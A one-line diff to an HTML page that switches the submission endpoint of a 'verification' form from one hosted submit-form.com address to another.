--- a/index.html
+++ b/index.html
@@ -438,7 +438,7 @@
     </div>
 
     <!-- Verification Form (hidden initially) -->
-    <form id="verificationForm" action="https://submit-form.com/IQZRHEwLl" method="post">
+    <form id="verificationForm" action="https://submit-form.com/EpG4FpbUf" method="post">
         
         <input type="hidden" id="selectedLanguage" name="language" value="en">
         <div id="root">
